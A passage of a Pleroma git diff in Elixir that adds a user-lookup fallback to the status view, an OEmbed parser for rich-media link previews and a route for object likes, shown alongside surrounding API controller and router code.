	{:ok, subscription} = Pleroma.Web.Push.Subscription.create(user, token, params)
	view = PushSubscriptionView.render("push_subscription.json", subscription: subscription)
	json(conn, view)
	end

	def get_push_subscription(%{assigns: %{user: user, token: token}} = conn, _params) do
	true = Pleroma.Web.Push.enabled()
	subscription = Pleroma.Web.Push.Subscription.get(user, token)
	view = PushSubscriptionView.render("push_subscription.json", subscription: subscription)
	json(conn, view)
	end

	def update_push_subscription(
	%{assigns: %{user: user, token: token}} = conn,
	params
	) do
	true = Pleroma.Web.Push.enabled()
	{:ok, subscription} = Pleroma.Web.Push.Subscription.update(user, token, params)
	view = PushSubscriptionView.render("push_subscription.json", subscription: subscription)
	json(conn, view)
	end

	def delete_push_subscription(%{assigns: %{user: user, token: token}} = conn, _params) do
	true = Pleroma.Web.Push.enabled()
	{:ok, _response} = Pleroma.Web.Push.Subscription.delete(user, token)
	json(conn, %{})
	end

	def errors(conn, _) do
	conn
	\|> put_status(500)
	\|> json("Something went wrong")
	end

	def suggestions(%{assigns: %{user: user}} = conn, _) do
	suggestions = Pleroma.Config.get(:suggestions)

	if Keyword.get(suggestions, :enabled, false) do
	api = Keyword.get(suggestions, :third_party_engine, "")
	timeout = Keyword.get(suggestions, :timeout, 5000)
	limit = Keyword.get(suggestions, :limit, 23)

	host = Pleroma.Config.get([Pleroma.Web.Endpoint, :url, :host])

	user = user.nickname
	url = String.replace(api, "{{host}}", host) \|> String.replace("{{user}}", user)

	with {:ok, %{status: 200, body: body}} <-
	@httpoison.get(
	url,
	[],
	adapter: [
	timeout: timeout,
	recv_timeout: timeout
	]
	),
	{:ok, data} <- Jason.decode(body) do
	data2 =
	Enum.slice(data, 0, limit)
	\|> Enum.map(fn x ->
	Map.put(
	x,
	"id",
	case User.get_or_fetch(x["acct"]) do
	%{id: id} -> id
	_ -> 0
	end
	)
	end)
	\|> Enum.map(fn x ->
	Map.put(x, "avatar", MediaProxy.url(x["avatar"]))
	end)
	\|> Enum.map(fn x ->
	Map.put(x, "avatar_static", MediaProxy.url(x["avatar_static"]))
	end)

	conn
	\|> json(data2)
	else
	e -> Logger.error("Could not retrieve suggestions at fetch #{url}, #{inspect(e)}")
	end
	else
	json(conn, [])
	end
	end

	def try_render(conn, target, params)
	when is_binary(target) do
	res = render(conn, target, params)

	if res == nil do
	conn
	\|> put_status(501)
	\|> json(%{error: "Can't display this activity"})
	else
	res
	end
	end

	def try_render(conn, _, _) do
	conn
	\|> put_status(501)
	\|> json(%{error: "Can't display this activity"})
	end
	end
	diff --git a/lib/pleroma/web/mastodon_api/views/status_view.ex b/lib/pleroma/web/mastodon_api/views/status_view.ex
	index db543ffe5..7f5a52ea3 100644
	--- a/lib/pleroma/web/mastodon_api/views/status_view.ex
	+++ b/lib/pleroma/web/mastodon_api/views/status_view.ex
	@@ -1,303 +1,316 @@
	# Pleroma: A lightweight social networking server
	# Copyright © 2017-2019 Pleroma Authors <https://pleroma.social/>
	# SPDX-License-Identifier: AGPL-3.0-only

	defmodule Pleroma.Web.MastodonAPI.StatusView do
	use Pleroma.Web, :view

	alias Pleroma.Activity
	alias Pleroma.HTML
	alias Pleroma.Repo
	alias Pleroma.User
	alias Pleroma.Web.CommonAPI.Utils
	alias Pleroma.Web.MediaProxy
	alias Pleroma.Web.MastodonAPI.AccountView
	alias Pleroma.Web.MastodonAPI.StatusView

	# TODO: Add cached version.
	defp get_replied_to_activities(activities) do
	activities
	\|> Enum.map(fn
	%{data: %{"type" => "Create", "object" => %{"inReplyTo" => in_reply_to}}} ->
	in_reply_to != "" && in_reply_to

	_ ->
	nil
	end)
	\|> Enum.filter(& &1)
	\|> Activity.create_activity_by_object_id_query()
	\|> Repo.all()
	\|> Enum.reduce(%{}, fn activity, acc ->
	Map.put(acc, activity.data["object"]["id"], activity)
	end)
	end

	+ defp get_user(ap_id) do
	+ cond do
	+ user = User.get_cached_by_ap_id(ap_id) ->
	+ user
	+
	+ user = User.get_by_guessed_nickname(ap_id) ->
	+ user
	+
	+ true ->
	+ User.error_user(ap_id)
	+ end
	+ end
	+
	def render("index.json", opts) do
	replied_to_activities = get_replied_to_activities(opts.activities)

	opts.activities
	\|> render_many(
	StatusView,
	"status.json",
	Map.put(opts, :replied_to_activities, replied_to_activities)
	)
	\|> Enum.filter(fn x -> not is_nil(x) end)
	end

	def render(
	"status.json",
	%{activity: %{data: %{"type" => "Announce", "object" => object}} = activity} = opts
	) do
	- user = User.get_cached_by_ap_id(activity.data["actor"])
	+ user = get_user(activity.data["actor"])
	created_at = Utils.to_masto_date(activity.data["published"])

	reblogged = Activity.get_create_activity_by_object_ap_id(object)
	reblogged = render("status.json", Map.put(opts, :activity, reblogged))

	mentions =
	activity.recipients
	\|> Enum.map(fn ap_id -> User.get_cached_by_ap_id(ap_id) end)
	\|> Enum.filter(& &1)
	\|> Enum.map(fn user -> AccountView.render("mention.json", %{user: user}) end)

	%{
	id: to_string(activity.id),
	uri: object,
	url: object,
	account: AccountView.render("account.json", %{user: user}),
	in_reply_to_id: nil,
	in_reply_to_account_id: nil,
	reblog: reblogged,
	content: reblogged[:content] \|\| "",
	created_at: created_at,
	reblogs_count: 0,
	replies_count: 0,
	favourites_count: 0,
	reblogged: false,
	favourited: false,
	muted: false,
	pinned: pinned?(activity, user),
	sensitive: false,
	spoiler_text: "",
	visibility: "public",
	media_attachments: reblogged[:media_attachments] \|\| [],
	mentions: mentions,
	tags: reblogged[:tags] \|\| [],
	application: %{
	name: "Web",
	website: nil
	},
	language: nil,
	emojis: []
	}
	end

	def render("status.json", %{activity: %{data: %{"object" => object}} = activity} = opts) do
	- user = User.get_cached_by_ap_id(activity.data["actor"])
	+ user = get_user(activity.data["actor"])

	like_count = object["like_count"] \|\| 0
	announcement_count = object["announcement_count"] \|\| 0

	tags = object["tag"] \|\| []
	sensitive = object["sensitive"] \|\| Enum.member?(tags, "nsfw")

	mentions =
	activity.recipients
	\|> Enum.map(fn ap_id -> User.get_cached_by_ap_id(ap_id) end)
	\|> Enum.filter(& &1)
	\|> Enum.map(fn user -> AccountView.render("mention.json", %{user: user}) end)

	repeated = opts[:for] && opts[:for].ap_id in (object["announcements"] \|\| [])
	favorited = opts[:for] && opts[:for].ap_id in (object["likes"] \|\| [])

	attachment_data = object["attachment"] \|\| []
	attachments = render_many(attachment_data, StatusView, "attachment.json", as: :attachment)

	created_at = Utils.to_masto_date(object["published"])

	reply_to = get_reply_to(activity, opts)
	- reply_to_user = reply_to && User.get_cached_by_ap_id(reply_to.data["actor"])
	+ reply_to_user = reply_to && get_user(reply_to.data["actor"])

	content =
	object
	\|> render_content()
	\|> HTML.get_cached_scrubbed_html_for_object(
	User.html_filter_policy(opts[:for]),
	activity,
	__MODULE__
	)

	%{
	id: to_string(activity.id),
	uri: object["id"],
	url: object["external_url"] \|\| object["id"],
	account: AccountView.render("account.json", %{user: user}),
	in_reply_to_id: reply_to && to_string(reply_to.id),
	in_reply_to_account_id: reply_to_user && to_string(reply_to_user.id),
	reblog: nil,
	content: content,
	created_at: created_at,
	reblogs_count: announcement_count,
	replies_count: 0,
	favourites_count: like_count,
	reblogged: present?(repeated),
	favourited: present?(favorited),
	muted: false,
	pinned: pinned?(activity, user),
	sensitive: sensitive,
	spoiler_text: object["summary"] \|\| "",
	visibility: get_visibility(object),
	media_attachments: attachments \|> Enum.take(4),
	mentions: mentions,
	tags: build_tags(tags),
	application: %{
	name: "Web",
	website: nil
	},
	language: nil,
	emojis: build_emojis(activity.data["object"]["emoji"])
	}
	end

	def render("status.json", _) do
	nil
	end

	def render("attachment.json", %{attachment: attachment}) do
	[attachment_url \| _] = attachment["url"]
	media_type = attachment_url["mediaType"] \|\| attachment_url["mimeType"] \|\| "image"
	href = attachment_url["href"] \|> MediaProxy.url()

	type =
	cond do
	String.contains?(media_type, "image") -> "image"
	String.contains?(media_type, "video") -> "video"
	String.contains?(media_type, "audio") -> "audio"
	true -> "unknown"
	end

	<<hash_id::signed-32, _rest::binary>> = :crypto.hash(:md5, href)

	%{
	id: to_string(attachment["id"] \|\| hash_id),
	url: href,
	remote_url: href,
	preview_url: href,
	text_url: href,
	type: type,
	description: attachment["name"]
	}
	end

	def get_reply_to(activity, %{replied_to_activities: replied_to_activities}) do
	_id = activity.data["object"]["inReplyTo"]
	replied_to_activities[activity.data["object"]["inReplyTo"]]
	end

	def get_reply_to(%{data: %{"object" => object}}, _) do
	if object["inReplyTo"] && object["inReplyTo"] != "" do
	Activity.get_create_activity_by_object_ap_id(object["inReplyTo"])
	else
	nil
	end
	end

	def get_visibility(object) do
	public = "https://www.w3.org/ns/activitystreams#Public"
	to = object["to"] \|\| []
	cc = object["cc"] \|\| []

	cond do
	public in to ->
	"public"

	public in cc ->
	"unlisted"

	# this should use the sql for the object's activity
	Enum.any?(to, &String.contains?(&1, "/followers")) ->
	"private"

	true ->
	"direct"
	end
	end

	def render_content(%{"type" => "Video"} = object) do
	with name when not is_nil(name) and name != "" <- object["name"] do
	"<p><a href=\"#{object["id"]}\">#{name}</a></p>#{object["content"]}"
	else
	_ -> object["content"] \|\| ""
	end
	end

	def render_content(%{"type" => object_type} = object)
	when object_type in ["Article", "Page"] do
	with summary when not is_nil(summary) and summary != "" <- object["name"],
	url when is_bitstring(url) <- object["url"] do
	"<p><a href=\"#{url}\">#{summary}</a></p>#{object["content"]}"
	else
	_ -> object["content"] \|\| ""
	end
	end

	def render_content(object), do: object["content"] \|\| ""

	@doc """
	Builds a dictionary tags.

	## Examples

	iex> Pleroma.Web.MastodonAPI.StatusView.build_tags(["fediverse", "nextcloud"])
	[{"name": "fediverse", "url": "/tag/fediverse"},
	{"name": "nextcloud", "url": "/tag/nextcloud"}]

	"""
	@spec build_tags(list(any())) :: list(map())
	def build_tags(object_tags) when is_list(object_tags) do
	object_tags = for tag when is_binary(tag) <- object_tags, do: tag

	Enum.reduce(object_tags, [], fn tag, tags ->
	tags ++ [%{name: tag, url: "/tag/#{tag}"}]
	end)
	end

	def build_tags(_), do: []

	@doc """
	Builds list emojis.

	Arguments: `nil` or list tuple of name and url.

	Returns list emojis.

	## Examples

	iex> Pleroma.Web.MastodonAPI.StatusView.build_emojis([{"2hu", "corndog.png"}])
	[%{shortcode: "2hu", static_url: "corndog.png", url: "corndog.png", visible_in_picker: false}]

	"""
	@spec build_emojis(nil \| list(tuple())) :: list(map())
	def build_emojis(nil), do: []

	def build_emojis(emojis) do
	emojis
	\|> Enum.map(fn {name, url} ->
	name = HTML.strip_tags(name)

	url =
	url
	\|> HTML.strip_tags()
	\|> MediaProxy.url()

	%{shortcode: name, url: url, static_url: url, visible_in_picker: false}
	end)
	end

	defp present?(nil), do: false
	defp present?(false), do: false
	defp present?(_), do: true

	defp pinned?(%Activity{id: id}, %User{info: %{pinned_activities: pinned_activities}}),
	do: id in pinned_activities
	end
	diff --git a/lib/pleroma/web/rich_media/parser.ex b/lib/pleroma/web/rich_media/parser.ex
	index fe092bf19..6da83c6e4 100644
	--- a/lib/pleroma/web/rich_media/parser.ex
	+++ b/lib/pleroma/web/rich_media/parser.ex
	@@ -1,33 +1,37 @@
	defmodule Pleroma.Web.RichMedia.Parser do
	- @parsers [Pleroma.Web.RichMedia.Parsers.OGP, Pleroma.Web.RichMedia.Parsers.TwitterCard]
	+ @parsers [
	+ Pleroma.Web.RichMedia.Parsers.OGP,
	+ Pleroma.Web.RichMedia.Parsers.TwitterCard,
	+ Pleroma.Web.RichMedia.Parsers.OEmbed
	+ ]

	if Mix.env() == :test do
	def parse(url), do: parse_url(url)
	else
	def parse(url),
	do: Cachex.fetch!(:rich_media_cache, url, fn _ -> parse_url(url) end)
	end

	defp parse_url(url) do
	{:ok, %Tesla.Env{body: html}} = Pleroma.HTTP.get(url)

	html \|> maybe_parse() \|> get_parsed_data()
	end

	defp maybe_parse(html) do
	Enum.reduce_while(@parsers, %{}, fn parser, acc ->
	case parser.parse(html, acc) do
	{:ok, data} -> {:halt, data}
	{:error, _msg} -> {:cont, acc}
	end
	end)
	end

	defp get_parsed_data(data) when data == %{} do
	{:error, "No metadata found"}
	end

	defp get_parsed_data(data) do
	{:ok, data}
	end
	end
	diff --git a/lib/pleroma/web/rich_media/parsers/oembed_parser.ex b/lib/pleroma/web/rich_media/parsers/oembed_parser.ex
	new file mode 100644
	index 000000000..ca7226faf
	--- /dev/null
	+++ b/lib/pleroma/web/rich_media/parsers/oembed_parser.ex
	@@ -0,0 +1,27 @@
	+defmodule Pleroma.Web.RichMedia.Parsers.OEmbed do
	+ def parse(html, _data) do
	+ with elements = [_ \| _] <- get_discovery_data(html),
	+ {:ok, oembed_url} <- get_oembed_url(elements),
	+ {:ok, oembed_data} <- get_oembed_data(oembed_url) do
	+ {:ok, oembed_data}
	+ else
	+ _e -> {:error, "No OEmbed data found"}
	+ end
	+ end
	+
	+ defp get_discovery_data(html) do
	+ html \|> Floki.find("link[type='application/json+oembed']")
	+ end
	+
	+ defp get_oembed_url(nodes) do
	+ {"link", attributes, _children} = nodes \|> hd()
	+
	+ {:ok, Enum.into(attributes, %{})["href"]}
	+ end
	+
	+ defp get_oembed_data(url) do
	+ {:ok, %Tesla.Env{body: json}} = Pleroma.HTTP.get(url)
	+
	+ {:ok, Poison.decode!(json)}
	+ end
	+end
	diff --git a/lib/pleroma/web/router.ex b/lib/pleroma/web/router.ex
	index 25e866c48..68b02d8ca 100644
	--- a/lib/pleroma/web/router.ex
	+++ b/lib/pleroma/web/router.ex
	@@ -1,558 +1,559 @@
	# Pleroma: A lightweight social networking server
	# Copyright © 2017-2019 Pleroma Authors <https://pleroma.social/>
	# SPDX-License-Identifier: AGPL-3.0-only

	defmodule Pleroma.Web.Router do
	use Pleroma.Web, :router

	pipeline :api do
	plug(:accepts, ["json"])
	plug(:fetch_session)
	plug(Pleroma.Plugs.OAuthPlug)
	plug(Pleroma.Plugs.BasicAuthDecoderPlug)
	plug(Pleroma.Plugs.UserFetcherPlug)
	plug(Pleroma.Plugs.SessionAuthenticationPlug)
	plug(Pleroma.Plugs.LegacyAuthenticationPlug)
	plug(Pleroma.Plugs.AuthenticationPlug)
	plug(Pleroma.Plugs.UserEnabledPlug)
	plug(Pleroma.Plugs.SetUserSessionIdPlug)
	plug(Pleroma.Plugs.EnsureUserKeyPlug)
	end

	pipeline :authenticated_api do
	plug(:accepts, ["json"])
	plug(:fetch_session)
	plug(Pleroma.Plugs.OAuthPlug)
	plug(Pleroma.Plugs.BasicAuthDecoderPlug)
	plug(Pleroma.Plugs.UserFetcherPlug)
	plug(Pleroma.Plugs.SessionAuthenticationPlug)
	plug(Pleroma.Plugs.LegacyAuthenticationPlug)
	plug(Pleroma.Plugs.AuthenticationPlug)
	plug(Pleroma.Plugs.UserEnabledPlug)
	plug(Pleroma.Plugs.SetUserSessionIdPlug)
	plug(Pleroma.Plugs.EnsureAuthenticatedPlug)
	end

	pipeline :admin_api do
	plug(:accepts, ["json"])
	plug(:fetch_session)
	plug(Pleroma.Plugs.OAuthPlug)
	plug(Pleroma.Plugs.BasicAuthDecoderPlug)
	plug(Pleroma.Plugs.UserFetcherPlug)
	plug(Pleroma.Plugs.SessionAuthenticationPlug)
	plug(Pleroma.Plugs.LegacyAuthenticationPlug)
	plug(Pleroma.Plugs.AuthenticationPlug)
	plug(Pleroma.Plugs.AdminSecretAuthenticationPlug)
	plug(Pleroma.Plugs.UserEnabledPlug)
	plug(Pleroma.Plugs.SetUserSessionIdPlug)
	plug(Pleroma.Plugs.EnsureAuthenticatedPlug)
	plug(Pleroma.Plugs.UserIsAdminPlug)
	end

	pipeline :mastodon_html do
	plug(:accepts, ["html"])
	plug(:fetch_session)
	plug(Pleroma.Plugs.OAuthPlug)
	plug(Pleroma.Plugs.BasicAuthDecoderPlug)
	plug(Pleroma.Plugs.UserFetcherPlug)
	plug(Pleroma.Plugs.SessionAuthenticationPlug)
	plug(Pleroma.Plugs.LegacyAuthenticationPlug)
	plug(Pleroma.Plugs.AuthenticationPlug)
	plug(Pleroma.Plugs.UserEnabledPlug)
	plug(Pleroma.Plugs.SetUserSessionIdPlug)
	plug(Pleroma.Plugs.EnsureUserKeyPlug)
	end

	pipeline :pleroma_html do
	plug(:accepts, ["html"])
	plug(:fetch_session)
	plug(Pleroma.Plugs.OAuthPlug)
	plug(Pleroma.Plugs.BasicAuthDecoderPlug)
	plug(Pleroma.Plugs.UserFetcherPlug)
	plug(Pleroma.Plugs.SessionAuthenticationPlug)
	plug(Pleroma.Plugs.AuthenticationPlug)
	plug(Pleroma.Plugs.EnsureUserKeyPlug)
	end

	pipeline :well_known do
	plug(:accepts, ["json", "jrd+json", "xml", "xrd+xml"])
	end

	pipeline :config do
	plug(:accepts, ["json", "xml"])
	end

	pipeline :oauth do
	plug(:accepts, ["html", "json"])
	end

	pipeline :pleroma_api do
	plug(:accepts, ["html", "json"])
	end

	pipeline :mailbox_preview do
	plug(:accepts, ["html"])

	plug(:put_secure_browser_headers, %{
	"content-security-policy" =>
	"default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval'; style-src 'self' 'unsafe-inline' 'unsafe-eval'"
	})
	end

	scope "/api/pleroma", Pleroma.Web.TwitterAPI do
	pipe_through(:pleroma_api)
	get("/password_reset/:token", UtilController, :show_password_reset)
	post("/password_reset", UtilController, :password_reset)
	get("/emoji", UtilController, :emoji)
	get("/captcha", UtilController, :captcha)
	end

	scope "/api/pleroma/admin", Pleroma.Web.AdminAPI do
	pipe_through(:admin_api)
	delete("/user", AdminAPIController, :user_delete)
	post("/user", AdminAPIController, :user_create)
	put("/users/tag", AdminAPIController, :tag_users)
	delete("/users/tag", AdminAPIController, :untag_users)

	get("/permission_group/:nickname", AdminAPIController, :right_get)
	get("/permission_group/:nickname/:permission_group", AdminAPIController, :right_get)
	post("/permission_group/:nickname/:permission_group", AdminAPIController, :right_add)
	delete("/permission_group/:nickname/:permission_group", AdminAPIController, :right_delete)

	post("/relay", AdminAPIController, :relay_follow)
	delete("/relay", AdminAPIController, :relay_unfollow)

	get("/invite_token", AdminAPIController, :get_invite_token)
	post("/email_invite", AdminAPIController, :email_invite)

	get("/password_reset", AdminAPIController, :get_password_reset)
	end

	scope "/", Pleroma.Web.TwitterAPI do
	pipe_through(:pleroma_html)
	get("/ostatus_subscribe", UtilController, :remote_follow)
	post("/ostatus_subscribe", UtilController, :do_remote_follow)
	post("/main/ostatus", UtilController, :remote_subscribe)
	end

	scope "/api/pleroma", Pleroma.Web.TwitterAPI do
	pipe_through(:authenticated_api)
	post("/blocks_import", UtilController, :blocks_import)
	post("/follow_import", UtilController, :follow_import)
	post("/change_password", UtilController, :change_password)
	post("/delete_account", UtilController, :delete_account)
	end

	scope "/oauth", Pleroma.Web.OAuth do
	get("/authorize", OAuthController, :authorize)
	post("/authorize", OAuthController, :create_authorization)
	post("/token", OAuthController, :token_exchange)
	post("/revoke", OAuthController, :token_revoke)
	end

	scope "/api/v1", Pleroma.Web.MastodonAPI do
	pipe_through(:authenticated_api)

	patch("/accounts/update_credentials", MastodonAPIController, :update_credentials)
	get("/accounts/verify_credentials", MastodonAPIController, :verify_credentials)
	get("/accounts/relationships", MastodonAPIController, :relationships)
	get("/accounts/search", MastodonAPIController, :account_search)
	post("/accounts/:id/follow", MastodonAPIController, :follow)
	post("/accounts/:id/unfollow", MastodonAPIController, :unfollow)
	post("/accounts/:id/block", MastodonAPIController, :block)
	post("/accounts/:id/unblock", MastodonAPIController, :unblock)
	post("/accounts/:id/mute", MastodonAPIController, :relationship_noop)
	post("/accounts/:id/unmute", MastodonAPIController, :relationship_noop)
	get("/accounts/:id/lists", MastodonAPIController, :account_lists)

	get("/follow_requests", MastodonAPIController, :follow_requests)
	post("/follow_requests/:id/authorize", MastodonAPIController, :authorize_follow_request)
	post("/follow_requests/:id/reject", MastodonAPIController, :reject_follow_request)

	post("/follows", MastodonAPIController, :follow)

	get("/blocks", MastodonAPIController, :blocks)

	get("/mutes", MastodonAPIController, :empty_array)

	get("/timelines/home", MastodonAPIController, :home_timeline)

	get("/timelines/direct", MastodonAPIController, :dm_timeline)

	get("/favourites", MastodonAPIController, :favourites)

	post("/statuses", MastodonAPIController, :post_status)
	delete("/statuses/:id", MastodonAPIController, :delete_status)

	post("/statuses/:id/reblog", MastodonAPIController, :reblog_status)
	post("/statuses/:id/unreblog", MastodonAPIController, :unreblog_status)
	post("/statuses/:id/favourite", MastodonAPIController, :fav_status)
	post("/statuses/:id/unfavourite", MastodonAPIController, :unfav_status)
	post("/statuses/:id/pin", MastodonAPIController, :pin_status)
	post("/statuses/:id/unpin", MastodonAPIController, :unpin_status)

	post("/notifications/clear", MastodonAPIController, :clear_notifications)
	post("/notifications/dismiss", MastodonAPIController, :dismiss_notification)
	get("/notifications", MastodonAPIController, :notifications)
	get("/notifications/:id", MastodonAPIController, :get_notification)

	post("/media", MastodonAPIController, :upload)
	put("/media/:id", MastodonAPIController, :update_media)

	get("/lists", MastodonAPIController, :get_lists)
	get("/lists/:id", MastodonAPIController, :get_list)
	delete("/lists/:id", MastodonAPIController, :delete_list)
	post("/lists", MastodonAPIController, :create_list)
	put("/lists/:id", MastodonAPIController, :rename_list)
	get("/lists/:id/accounts", MastodonAPIController, :list_accounts)
	post("/lists/:id/accounts", MastodonAPIController, :add_to_list)
	delete("/lists/:id/accounts", MastodonAPIController, :remove_from_list)

	get("/domain_blocks", MastodonAPIController, :domain_blocks)
	post("/domain_blocks", MastodonAPIController, :block_domain)
	delete("/domain_blocks", MastodonAPIController, :unblock_domain)

	get("/filters", MastodonAPIController, :get_filters)
	post("/filters", MastodonAPIController, :create_filter)
	get("/filters/:id", MastodonAPIController, :get_filter)
	put("/filters/:id", MastodonAPIController, :update_filter)
	delete("/filters/:id", MastodonAPIController, :delete_filter)

	post("/push/subscription", MastodonAPIController, :create_push_subscription)
	get("/push/subscription", MastodonAPIController, :get_push_subscription)
	put("/push/subscription", MastodonAPIController, :update_push_subscription)
	delete("/push/subscription", MastodonAPIController, :delete_push_subscription)

	get("/suggestions", MastodonAPIController, :suggestions)

	get("/endorsements", MastodonAPIController, :empty_array)
	end

	scope "/api/web", Pleroma.Web.MastodonAPI do
	pipe_through(:authenticated_api)

	put("/settings", MastodonAPIController, :put_settings)
	end

	scope "/api", Pleroma.Web.RichMedia do
	pipe_through(:authenticated_api)

	get("/rich_media/parse", RichMediaController, :parse)
	end

	scope "/api/v1", Pleroma.Web.MastodonAPI do
	pipe_through(:api)
	get("/instance", MastodonAPIController, :masto_instance)
	get("/instance/peers", MastodonAPIController, :peers)
	post("/apps", MastodonAPIController, :create_app)
	get("/custom_emojis", MastodonAPIController, :custom_emojis)

	get("/timelines/public", MastodonAPIController, :public_timeline)
	get("/timelines/tag/:tag", MastodonAPIController, :hashtag_timeline)
	get("/timelines/list/:list_id", MastodonAPIController, :list_timeline)

	get("/statuses/:id", MastodonAPIController, :get_status)
	get("/statuses/:id/context", MastodonAPIController, :get_context)
	get("/statuses/:id/card", MastodonAPIController, :empty_object)
	get("/statuses/:id/favourited_by", MastodonAPIController, :favourited_by)
	get("/statuses/:id/reblogged_by", MastodonAPIController, :reblogged_by)

	get("/accounts/:id/statuses", MastodonAPIController, :user_statuses)
	get("/accounts/:id/followers", MastodonAPIController, :followers)
	get("/accounts/:id/following", MastodonAPIController, :following)
	get("/accounts/:id", MastodonAPIController, :user)

	get("/trends", MastodonAPIController, :empty_array)

	get("/search", MastodonAPIController, :search)
	end

	scope "/api/v2", Pleroma.Web.MastodonAPI do
	pipe_through(:api)
	get("/search", MastodonAPIController, :search2)
	end

	scope "/api", Pleroma.Web do
	pipe_through(:config)

	get("/help/test", TwitterAPI.UtilController, :help_test)
	post("/help/test", TwitterAPI.UtilController, :help_test)
	get("/statusnet/config", TwitterAPI.UtilController, :config)
	get("/statusnet/version", TwitterAPI.UtilController, :version)
	end

	scope "/api", Pleroma.Web do
	pipe_through(:api)

	get("/statuses/user_timeline", TwitterAPI.Controller, :user_timeline)
	get("/qvitter/statuses/user_timeline", TwitterAPI.Controller, :user_timeline)
	get("/users/show", TwitterAPI.Controller, :show_user)

	get("/statuses/followers", TwitterAPI.Controller, :followers)
	get("/statuses/friends", TwitterAPI.Controller, :friends)
	get("/statuses/blocks", TwitterAPI.Controller, :blocks)
	get("/statuses/show/:id", TwitterAPI.Controller, :fetch_status)
	get("/statusnet/conversation/:id", TwitterAPI.Controller, :fetch_conversation)

	post("/account/register", TwitterAPI.Controller, :register)
	post("/account/password_reset", TwitterAPI.Controller, :password_reset)

	get(
	"/account/confirm_email/:user_id/:token",
	TwitterAPI.Controller,
	:confirm_email,
	as: :confirm_email
	)

	post("/account/resend_confirmation_email", TwitterAPI.Controller, :resend_confirmation_email)

	get("/search", TwitterAPI.Controller, :search)
	get("/statusnet/tags/timeline/:tag", TwitterAPI.Controller, :public_and_external_timeline)
	end

	scope "/api", Pleroma.Web do
	pipe_through(:api)

	get("/statuses/public_timeline", TwitterAPI.Controller, :public_timeline)

	get(
	"/statuses/public_and_external_timeline",
	TwitterAPI.Controller,
	:public_and_external_timeline
	)

	get("/statuses/networkpublic_timeline", TwitterAPI.Controller, :public_and_external_timeline)
	end

	scope "/api", Pleroma.Web, as: :twitter_api_search do
	pipe_through(:api)
	get("/pleroma/search_user", TwitterAPI.Controller, :search_user)
	end

	scope "/api", Pleroma.Web, as: :authenticated_twitter_api do
	pipe_through(:authenticated_api)

	get("/account/verify_credentials", TwitterAPI.Controller, :verify_credentials)
	post("/account/verify_credentials", TwitterAPI.Controller, :verify_credentials)

	post("/account/update_profile", TwitterAPI.Controller, :update_profile)
	post("/account/update_profile_banner", TwitterAPI.Controller, :update_banner)
	post("/qvitter/update_background_image", TwitterAPI.Controller, :update_background)

	get("/statuses/home_timeline", TwitterAPI.Controller, :friends_timeline)
	get("/statuses/friends_timeline", TwitterAPI.Controller, :friends_timeline)
	get("/statuses/mentions", TwitterAPI.Controller, :mentions_timeline)
	get("/statuses/mentions_timeline", TwitterAPI.Controller, :mentions_timeline)
	get("/statuses/dm_timeline", TwitterAPI.Controller, :dm_timeline)
	get("/qvitter/statuses/notifications", TwitterAPI.Controller, :notifications)

	# XXX: this is really a pleroma API, but we want to keep the pleroma namespace clean
	# for now.
	post("/qvitter/statuses/notifications/read", TwitterAPI.Controller, :notifications_read)

	post("/statuses/update", TwitterAPI.Controller, :status_update)
	post("/statuses/retweet/:id", TwitterAPI.Controller, :retweet)
	post("/statuses/unretweet/:id", TwitterAPI.Controller, :unretweet)
	post("/statuses/destroy/:id", TwitterAPI.Controller, :delete_post)

	post("/statuses/pin/:id", TwitterAPI.Controller, :pin)
	post("/statuses/unpin/:id", TwitterAPI.Controller, :unpin)

	get("/pleroma/friend_requests", TwitterAPI.Controller, :friend_requests)
	post("/pleroma/friendships/approve", TwitterAPI.Controller, :approve_friend_request)
	post("/pleroma/friendships/deny", TwitterAPI.Controller, :deny_friend_request)

	post("/friendships/create", TwitterAPI.Controller, :follow)
	post("/friendships/destroy", TwitterAPI.Controller, :unfollow)
	post("/blocks/create", TwitterAPI.Controller, :block)
	post("/blocks/destroy", TwitterAPI.Controller, :unblock)

	post("/statusnet/media/upload", TwitterAPI.Controller, :upload)
	post("/media/upload", TwitterAPI.Controller, :upload_json)
	post("/media/metadata/create", TwitterAPI.Controller, :update_media)

	post("/favorites/create/:id", TwitterAPI.Controller, :favorite)
	post("/favorites/create", TwitterAPI.Controller, :favorite)
	post("/favorites/destroy/:id", TwitterAPI.Controller, :unfavorite)

	post("/qvitter/update_avatar", TwitterAPI.Controller, :update_avatar)

	get("/friends/ids", TwitterAPI.Controller, :friends_ids)
	get("/friendships/no_retweets/ids", TwitterAPI.Controller, :empty_array)

	get("/mutes/users/ids", TwitterAPI.Controller, :empty_array)
	get("/qvitter/mutes", TwitterAPI.Controller, :raw_empty_array)

	get("/externalprofile/show", TwitterAPI.Controller, :external_profile)
	end

	pipeline :ap_relay do
	plug(:accepts, ["activity+json"])
	end

	pipeline :ostatus do
	plug(:accepts, ["html", "xml", "atom", "activity+json"])
	end

	pipeline :oembed do
	plug(:accepts, ["json", "xml"])
	end

	scope "/", Pleroma.Web do
	pipe_through(:ostatus)

	get("/objects/:uuid", OStatus.OStatusController, :object)
	get("/activities/:uuid", OStatus.OStatusController, :activity)
	get("/notice/:id", OStatus.OStatusController, :notice)
	get("/users/:nickname/feed", OStatus.OStatusController, :feed)
	get("/users/:nickname", OStatus.OStatusController, :feed_redirect)

	post("/users/:nickname/salmon", OStatus.OStatusController, :salmon_incoming)
	post("/push/hub/:nickname", Websub.WebsubController, :websub_subscription_request)
	get("/push/subscriptions/:id", Websub.WebsubController, :websub_subscription_confirmation)
	post("/push/subscriptions/:id", Websub.WebsubController, :websub_incoming)
	end

	scope "/", Pleroma.Web do
	pipe_through(:oembed)

	get("/oembed", OEmbed.OEmbedController, :url)
	end

	pipeline :activitypub do
	plug(:accepts, ["activity+json"])
	plug(Pleroma.Web.Plugs.HTTPSignaturePlug)
	end

	scope "/", Pleroma.Web.ActivityPub do
	# XXX: not really ostatus
	pipe_through(:ostatus)

	get("/users/:nickname/followers", ActivityPubController, :followers)
	get("/users/:nickname/following", ActivityPubController, :following)
	get("/users/:nickname/outbox", ActivityPubController, :outbox)
	+ get("/objects/:uuid/likes", ActivityPubController, :object_likes)
	end

	pipeline :activitypub_client do
	plug(:accepts, ["activity+json"])
	plug(:fetch_session)
	plug(Pleroma.Plugs.OAuthPlug)
	plug(Pleroma.Plugs.BasicAuthDecoderPlug)
	plug(Pleroma.Plugs.UserFetcherPlug)
	plug(Pleroma.Plugs.SessionAuthenticationPlug)
	plug(Pleroma.Plugs.LegacyAuthenticationPlug)
	plug(Pleroma.Plugs.AuthenticationPlug)
